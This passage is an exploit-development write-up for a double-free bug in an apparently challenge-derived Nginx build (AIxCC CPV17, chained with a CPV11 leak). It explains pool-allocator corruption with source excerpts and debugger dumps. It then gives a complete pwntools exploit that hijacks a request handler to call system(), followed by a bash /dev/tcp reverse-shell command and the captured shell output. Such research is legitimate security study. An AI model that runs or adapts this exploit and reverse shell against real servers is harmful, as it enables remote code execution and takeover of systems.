0x00007b7aa7e20010│+0x0010: 0x00007b7aa7e20000 → 0x00007b7aa7e2009d → 0x7555de17f0000061 ("a"?)
0x00007b7aa7e20018│+0x0018: 0x0000000000000000
0x00007b7aa7e20020│+0x0020: "127.0.0.1 - - [01/Mar/2025:16:29:13 +0000] "7\x13\[...]" ← $rsi
0x00007b7aa7e20028│+0x0028: "1 - - [01/Mar/2025:16:29:13 +0000] "7\x13\x00\x00\[...]"
0x00007b7aa7e20030│+0x0030: "1/Mar/2025:16:29:13 +0000] "7\x13\x00\x00\x00\x00\[...]"
0x00007b7aa7e20038│+0x0038: 0x39323a36313a3532
0x00007b7aa7e20040│+0x0040: 0x3030302b2033313a
0x00007b7aa7e20048│+0x0048: 0x31785c3722205d30
That’s a dead end. :(
Attempt 2: Large header buffer allocation
Let’s analyse the situation again.
HTTP requests consist of a request line followed by request headers. The request line is parsed and processed first, in `ngx_http_process_request_line`.
If the request line is invalid, Nginx finalises the request with `NGX_HTTP_BAD_REQUEST`, leading to a crash because the log buffer overlaps with the request object `r`.
If the request line is valid, the input header list `r->headers_in.headers` is allocated from the request pool `r->pool`, and the headers are then processed in `ngx_http_process_request_headers`. Allocating the input header list makes the pool allocator grab another pool block to satisfy the request, and because of the double free, the obtained pool block overlaps with `r->pool`. Then, in `ngx_http_process_request_headers`, the headers are parsed and processed one by one. Processing the first valid header corrupts `r->pool`, and the worker process crashes because `ngx_pnalloc` is called immediately after the corruption. What if we don't send any valid header, to avoid this crash? If we send no headers at all, nothing useful happens: the request is finalised and our input doesn't overlap with anything useful before crashing. If we send an invalid header, the request is terminated with `NGX_HTTP_BAD_REQUEST`.
This seems to be a dead end. I noticed that Nginx reads the input into a buffer of size 0x400 (`client_header_buffer_size`), but if the request line or the headers exceed this limit, a large buffer of size `large_client_header_buffers` is allocated instead. What if we allocate a large buffer that overlaps with `r->pool`?
But the large buffer size is 8k by default… Let's set it to 4k instead with `large_client_header_buffers 4 4096;`, which is a totally sensible configuration (see the example configuration: https://nginx.org/en/docs/example.html).
The exploit strategy becomes:
- Allocate a large buffer for the input data (`ngx_http_alloc_large_header_buffer`) that overlaps with `r->pool`.
- Write a less restricted charset to fix and control fields of `ngx_pool_t` and/or `ngx_http_request_t`.
In what situations is `ngx_http_alloc_large_header_buffer` called? It can be invoked during request line processing and during header processing. If we trigger the large buffer allocation during request line processing, the character set we can write is too limited, because the request line must be valid according to `ngx_http_parse_request_line` for the allocation to be reached.
/* NGX_AGAIN: a request line parsing is still incomplete */

if (r->header_in->pos == r->header_in->end) {

    rv = ngx_http_alloc_large_header_buffer(r, 1);
    // [...]

b = ngx_create_temp_buf(r->connection->pool,
                        cscf->large_client_header_buffers.size); // 0x2000 changed to 0x1000
What if we don’t trigger a large buffer allocation during request line processing but during headers processing?
Remember that after processing a valid request line, the header list is allocated from the pool, making the new pool block overlap with `r->pool`. This is necessary to reach the code path that processes request headers, but it's a problem, because we want the double-freed pointer to point at the large buffer. To solve this, I figured out that I could just trigger the double free bug again ;D.
Remember also that if we don't trigger a large allocation during request line processing and there is even one valid header, the application will crash. Therefore, we have to trigger a large allocation during header processing, and there mustn't be any valid header.
We face the same problem as before: a header in the small buffer must have valid syntax before Nginx proceeds to allocate a larger buffer for the remaining headers. This looks like a dead end.
What if we make the `(r->header_in->pos == r->header_in->end)` condition true with a request line of exactly the size of the small buffer, so that the large buffer allocation for the headers is triggered before any header is validated?
if (rc == NGX_AGAIN) {

    if (r->header_in->pos == r->header_in->end) { // make this condition true before reaching `NGX_HTTP_PARSE_INVALID_HEADER`

        rv = ngx_http_alloc_large_header_buffer(r, 0);

        if (rv == NGX_ERROR) {
            ngx_http_close_request(r, NGX_HTTP_INTERNAL_SERVER_ERROR);
            break;
        }

        if (rv == NGX_DECLINED) {
            p = r->header_name_start;

            r->lingering_close = 1;

            if (p == NULL) {
                ngx_log_error(NGX_LOG_INFO, c->log, 0,
                              "client sent too large request");
                ngx_http_finalize_request(r,
                                          NGX_HTTP_REQUEST_HEADER_TOO_LARGE);
                break;
            }

            len = r->header_in->end - p;

            if (len > NGX_MAX_ERROR_STR - 300) {
                len = NGX_MAX_ERROR_STR - 300;
            }

            ngx_log_error(NGX_LOG_INFO, c->log, 0,
                          "client sent too long header line: \"%*s...\"",
                          len, r->header_name_start);

            ngx_http_finalize_request(r,
                                      NGX_HTTP_REQUEST_HEADER_TOO_LARGE);
            break;
        }
    }

    n = ngx_http_read_request_header(r);

    if (n == NGX_AGAIN || n == NGX_ERROR) {
        break;
    }
}

/* the host header could change the server configuration context */

cscf = ngx_http_get_module_srv_conf(r, ngx_http_core_module);

rc = ngx_http_parse_header_line(r, r->header_in,
                                cscf->underscores_in_headers);

// [...]

/* rc == NGX_HTTP_PARSE_INVALID_HEADER */

ngx_log_error(NGX_LOG_INFO, c->log, 0,
              "client sent invalid header line: \"%*s\\x%02xd...\"",
              r->header_end - r->header_name_start,
              r->header_name_start, *r->header_end);

ngx_http_finalize_request(r, NGX_HTTP_BAD_REQUEST);
break;
Another issue: the old content of the client header buffer, which contains the valid request line, would normally be copied into the large buffer (and we don't want those ASCII letters to corrupt the pool and request objects). This copy doesn't happen when `r->state == 0` in `ngx_http_alloc_large_header_buffer`. `r->state` is set by the parsing functions: if Nginx runs out of bytes halfway through parsing a field such as a header line, the state is kept, and the data that is not yet completely parsed must be copied over to the new, larger buffer.
if (r->state == 0) {

    /*
     * r->state == 0 means that a header line was parsed successfully
     * and we do not need to copy incomplete header line and
     * to relocate the parser header pointers
     */

    r->header_in = b;

    return NGX_OK; // this way we can avoid copying useless data to the big buffer
}
The result is that we control 0x1000 bytes from the overlapped pool. So we indirectly control the request object allocated in the pool.
gef➤ tele pool
0x00007abeb6e20000│+0x0000: 0x0000000000001337 ← $rdi
0x00007abeb6e20008│+0x0008: 0x0000000000001338
0x00007abeb6e20010│+0x0010: "nice!\r\n\r\n"
0x00007abeb6e20018│+0x0018: 0x000000000000000a ("\n"?)
0x00007abeb6e20020│+0x0020: 0x0000000000000fb0
0x00007abeb6e20028│+0x0028: 0x00007abeb6e20000 → 0x0000000000001337
0x00007abeb6e20030│+0x0030: 0x0000000000000000
0x00007abeb6e20038│+0x0038: 0x0000000000000000
0x00007abeb6e20040│+0x0040: 0x0000000000000000
0x00007abeb6e20048│+0x0048: 0x00007abeb6e1e060 → 0x0000000000000004
gef➤
0x00007abeb6e20050│+0x0050: 0x0000000000000000
0x00007abeb6e20058│+0x0058: 0x0000000000000001
0x00007abeb6e20060│+0x0060: 0x0000000000000000
0x00007abeb6e20068│+0x0068: 0x0000000050545448 ("HTTP"?)
0x00007abeb6e20070│+0x0070: 0x00007abeb6e7f600 → 0x00007abeb6e20050 → 0x0000000000000000
0x00007abeb6e20078│+0x0078: 0x00007abeb6e20b20 → 0x0000000000000000
0x00007abeb6e20080│+0x0080: 0x00007abeb6e4dc88 → 0x00007abeb6e4e0d8 → 0x00007abeb6e4e378 → 0x00007abeb6e60470 → 0x00007abeb6e4fe38 → 0x0000000000000000
0x00007abeb6e20088│+0x0088: 0x00007abeb6e60190 → 0x00007abeb6e60470 → 0x00007abeb6e4fe38 → 0x0000000000000000
0x00007abeb6e20090│+0x0090: 0x00007abeb6e60300 → 0x00007abeb6e60518 → 0x0000000000000000
0x00007abeb6e20098│+0x0098: 0x00005c095e67275a → <ngx_http_block_reading+0000> endbr64
gef➤ p *pool
$4 = {
  d = {
    last = 0x1337 <error: Cannot access memory at address 0x1337>,
    end = 0x1338 <error: Cannot access memory at address 0x1338>,
    next = 0xd0a0d216563696e,
    failed = 0xa
  },
  max = 0xfb0,
  current = 0x7abeb6e20000,
  chain = 0x0,
  large = 0x0,
  cleanup = 0x0,
  log = 0x7abeb6e1e060
}
What should we write in order to hijack the control flow? Whatever we inject can't be a valid header, so Nginx will finalise the request with `ngx_http_finalize_request`, and I noticed a function pointer in the (controlled) `r` that gets invoked along the way. The exploit has to fix all the corrupted pointers that are accessed before this handler is reached.
if (r != r->main && r->post_subrequest) {
    rc = r->post_subrequest->handler(r, r->post_subrequest->data, rc); // XXXR3: inject here
}
We inject the address of `system` in libc and a pointer to a reverse shell command string, which is also placed in the corrupted pool. A plain `system('/bin/sh\x00')` would return immediately because Nginx closed `stdin`, hence the reverse shell.
How can we leak the heap and libc addresses? One observation I made is that crashing the worker process doesn't re-randomise the heap and libc addresses, so in theory we can brute-force them. Rather than brute-forcing, I realised that we can sometimes leak the address of a pool-allocated object in the vulnerable pool using this same bug, but only when compiling with `O3`, and it's not reliable. Another idea: chain the CPV11 bug to make a good guess of the vulnerable pool address, and from there a good guess of the libc address too.
The more stable exploit
The leaked address from CPV11 points into the heap. Using it, we can guess the heap base (e.g. `0x000075feb7000000`), the pool address and the libc base. I derived the offsets by restarting Nginx many times, which re-randomises the addresses. In practice, we could also brute-force the addresses wisely, given that crashing worker processes doesn't re-randomise and we have a heap leak to start from.
0x000075feb7000000 0x000075feb7800000 0x0000000000800000 rw-
0x000075feb7800000 0x000075feb789d000 0x000000000009d000 r-- /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.33
0x000075feb789d000 0x000075feb79e5000 0x0000000000148000 r-x /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.33
0x000075feb79e5000 0x000075feb7a6c000 0x0000000000087000 r-- /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.33
0x000075feb7a6c000 0x000075feb7a77000 0x000000000000b000 r-- /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.33
0x000075feb7a77000 0x000075feb7a7a000 0x0000000000003000 rw- /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.33
0x000075feb7a7a000 0x000075feb7a7e000 0x0000000000004000 rw-
0x000075feb7b17000 0x000075feb7b27000 0x0000000000010000 r-- /usr/lib/x86_64-linux-gnu/libm.so.6
0x000075feb7b27000 0x000075feb7ba6000 0x000000000007f000 r-x /usr/lib/x86_64-linux-gnu/libm.so.6
0x000075feb7ba6000 0x000075feb7bfe000 0x0000000000058000 r-- /usr/lib/x86_64-linux-gnu/libm.so.6
0x000075feb7bfe000 0x000075feb7bff000 0x0000000000001000 r-- /usr/lib/x86_64-linux-gnu/libm.so.6
0x000075feb7bff000 0x000075feb7c00000 0x0000000000001000 rw- /usr/lib/x86_64-linux-gnu/libm.so.6
0x000075feb7c00000 0x000075feb7c28000 0x0000000000028000 r-- /usr/lib/x86_64-linux-gnu/libc.so.6
0x000075feb7c28000 0x000075feb7db0000 0x0000000000188000 r-x /usr/lib/x86_64-linux-gnu/libc.so.6
0x000075feb7db0000 0x000075feb7dff000 0x000000000004f000 r-- /usr/lib/x86_64-linux-gnu/libc.so.6
0x000075feb7dff000 0x000075feb7e03000 0x0000000000004000 r-- /usr/lib/x86_64-linux-gnu/libc.so.6
0x000075feb7e03000 0x000075feb7e05000 0x0000000000002000 rw- /usr/lib/x86_64-linux-gnu/libc.so.6
With a configuration file like (simplified from Nginx AIxCC):
remote_admin off;

events {
}

mail {
    auth_http http://127.0.0.1:1025;
    xclient off;
    timeout 3600s;

    server {
        listen 2525;
        protocol smtp;
        smtp_auth none;
    }
}

http {
    large_client_header_buffers 4 4096;

    server {
        listen 127.0.0.1:8080;
        server_name localhost;

        location /host_specs {
            return 200 "Host Specifications:\n$host_specs";
        }
    }
}
The full exploit, tested on Ubuntu 24.04, is:
import socket
from pwn import *

libc = ELF('/usr/lib/x86_64-linux-gnu/libc.so.6', checksec=False)

host = '127.0.0.1'

leak_vuln_trigger = b'GET /host_specs HTTP/1.1\r\nHost: localhost\r\nConnection: Close\r\n\r\n'
vuln_trigger = b'NOOP f f f f f f f f f f f\r\n'

def tcp_conn(host, port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect( (host, port) )
    return s

def read_data(s):
    return s.makefile(mode='rb').read()

# 1. Leak using CPV11
s = tcp_conn(host, 8080)
payload = b'GET /host_specs HTTP/1.1' + b'\r\n'
payload += b'Host: localhost' + b'\r\n'
payload += b'Connection: Close' + b'\r\n'
payload += b'Black-List: 111.111.111.111;222.222.222.222;333.333.333.333;' + b'\r\n'
payload += b'\r\n'
s.send(payload)
s.send(leak_vuln_trigger)
response1 = read_data(s)
# print(response1)
leak = u64(response1.split(b'111.111.111.111')[1][0:6] + b'\0\0')
log.info(f'Leaked address = {hex(leak)}')
page_base = leak - 0x41d0a0
log.info(f'Page base = {hex(page_base)}')

# guess (we can change it to brute force wisely)
heap_address = page_base + 0x423000
libc.address = page_base + 0xc00000
log.info(f'Pool address = {hex(heap_address)}')
log.info(f'LIBC address = {hex(libc.address)}')

# 2. Trigger the CPV17 vuln twice
s = tcp_conn(host, 2525)
s.send(vuln_trigger)
s.close()

s = tcp_conn(host, 2525)
s.send(vuln_trigger)
s.close()

log.info('Execute: nc -lvnp 4444')
pause()

# 3. Overwrite a part of the pool object and the HTTP request object
s = tcp_conn(host, 8080)

request_line_base_len = len(b'GET / HTTP/1.1\r\n')
request_line = b'GET /' + b'A' * (0x400 - request_line_base_len) + b' HTTP/1.1\r\n'

# +0x88 : srv_conf
# +0xc8 : header_in
# +0x470 : post_subrequest
payload = b'bash -c "bash -i >& /dev/tcp/127.0.0.1/4444 0>&1"\0'
request_headers = b''.join((
    p64(0x1337) * ((0x50) // 8),
    payload,
    b'A' * (0x88 - 0x50 - len(payload)),
    p64(heap_address + 0x88),  # srv_conf (whatever pointed X if X+0x90 is a valid address)
    b'B' * (0xc8 - 0x88 - 0x8),
    p64(heap_address + 0xc8),  # headers_in.pos (whatever, eg. itself)
    p64(heap_address + 0xd0),  # headers_in.last (greater than .pos)
    p64(0x1338) * ((0x470 - 0xc8 - 0x10) // 8),
    p64(heap_address + 0x470 + 0x8),  # fake post_subrequest
    p64(libc.sym['system']),
    p64(0x1337),
))
payload = request_line + request_headers + b'\r\n\r\n'
s.send(payload)
response2 = read_data(s)
print(response2)
s.close()
$ python exploit_chain.py
[*] Leaked address = 0x7574e1a1d0a0
[*] Page base = 0x7574e1600000
[*] Pool address = 0x7574e1a23000
[*] LIBC address = 0x7574e2200000
[*] Execute: nc -lvnp 4444
[*] Paused (press any to continue)
Listening on 0.0.0.0 4444
Connection received on 127.0.0.1 41906
bash: cannot set terminal process group (136506): Inappropriate ioctl for device
bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
roundofthree@ubuntu:/tmp/cores$
Some comments on the exploitability of Nginx UAF bugs
Firstly, most objects and buffers are allocated from the pool allocator (`ngx_palloc` calls), so it's hard to find heap gadgets of the desired size allocated from the system allocator (through `ngx_alloc`).
Secondly, pool-allocated objects are never freed back into the pool. They are freed when the associated pool block is freed, that is, when the pool is destroyed. Since objects are slices of a pool block, the usual technique of overlapping same-size chunks doesn't apply: the granularity of allocation lifetimes is the pool, not the object (see the abridged allocator below). If we want to overlap a dangling pointer to an object with a victim object, we need to 1) overlap the destroyed pool block containing the dangling pointer's target with the pool block of the victim object, and 2) have the vulnerable object and the victim object at the same offset within their pool blocks.
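Abridged from the upstream Nginx source, small pool allocations just bump `d.last` within the current block; there is no per-object free path at all:

static ngx_inline void *
ngx_palloc_small(ngx_pool_t *pool, size_t size, ngx_uint_t align)
{
    u_char      *m;
    ngx_pool_t  *p;

    p = pool->current;

    do {
        m = p->d.last;

        if (align) {
            m = ngx_align_ptr(m, NGX_ALIGNMENT);
        }

        if ((size_t) (p->d.end - m) >= size) {
            p->d.last = m + size;       /* bump allocation: no headers, no free() */
            return m;
        }

        p = p->d.next;

    } while (p);

    return ngx_palloc_block(pool, size);
}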
Rather than corrupting an object allocated in the pool, the exploit for CPV17 relies on corrupting the pool itself, and through it the `ngx_http_request_t`, to achieve RCE.
Acknowledgements
Prof Robert N. M. Watson, for offering advice and ideas and giving me the opportunity to work on CHERI (although this is not about CHERI, it was derived from a CHERI-related project).
HackerChai, for the many conversations on bugs, reviewing drafts and helping me progress in this field.